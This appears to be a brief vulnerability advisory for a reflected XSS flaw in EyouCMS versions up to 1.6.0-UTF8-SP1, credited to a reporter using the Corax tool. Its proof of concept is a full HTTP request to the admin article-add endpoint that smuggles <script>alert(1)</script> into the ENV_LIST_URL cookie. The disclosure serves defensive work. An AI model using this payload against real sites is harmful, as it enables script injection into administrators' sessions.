Description
Background article publish with reflected-XSS in the cookie ENV_LIST_URL
.
Affected Version
EyouCMS <= 1.6.0-UTF8-SP1
POC
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15
| POST /cms/eyoucms/login.php?m=admin&c=Article&a=add&lang=cn HTTP/1.1 Host: 127.0.0.1:80 Connection: close Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Origin: http://127.0.0.1 Referer: http://127.0.0.1/cms/eyoucms/login.php?m=admin&c=Article&a=add&typeid=10&gourl=http%3A%2F%2F10.142.11.10%3A20003%2Feyoucms%2Flogin.php%3Fm%3Dadmin%26c%3DArchives%26a%3Dindex_archives%26typeid%3D10%26lang%3Dcn&lang=cn Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9,en;q=0.8 Cookie: PHPSESSID=lmqk1pcmj5egvt269qo4ijgg82; admin_lang=cn; home_lang=cn; referurl=http%3A%2F%2F127.0.0.1%2Fcms%2Feyoucms%2Findex.php%3Fm%3Duser%26c%3DPay%26a%3Dpay_consumer_details; users_id=1; ENV_IS_UPHTML=0; workspaceParam=index%7CArchives; ENV_GOBACK_URL=%2Feyoucms%2Flogin.php%3Fm%3Dadmin%26c%3DArchives%26a%3Dindex_archives%26lang%3D=cn; ENV_LIST_URL=%2Feyoucms%2Flogin.php%3Fm%3Dadmin%26c%3DArchives%26a%3Dindex_archives%26lang%3Dcn"/><script>alert(1)</script><a Content-Type: application/x-www-form-urlencoded Content-Length: 383
gourl=&free_content=&htmlfilename=&type_tempview=view_article.htm&tempview=view_article.htm&add_time=2022-11-05+20:47:11&arcrank=0&click=846&author=aa&seo_description=gaeg&seo_keywords=egae&seo_title=aeg&tags=aeg%2C%E6%93%8D%E4%BD%9C%E7%B3%BB%E7%BB%9F&addonFieldExt[content]=<p>aegaeg</p>&size=1&part_free=0&users_price=&litpic_remote=&litpic_local=&jumplinks=&typeid=11&title=aegaeg
|
Reference
Reported by Srpopty, vulnerability discovered by using Corax.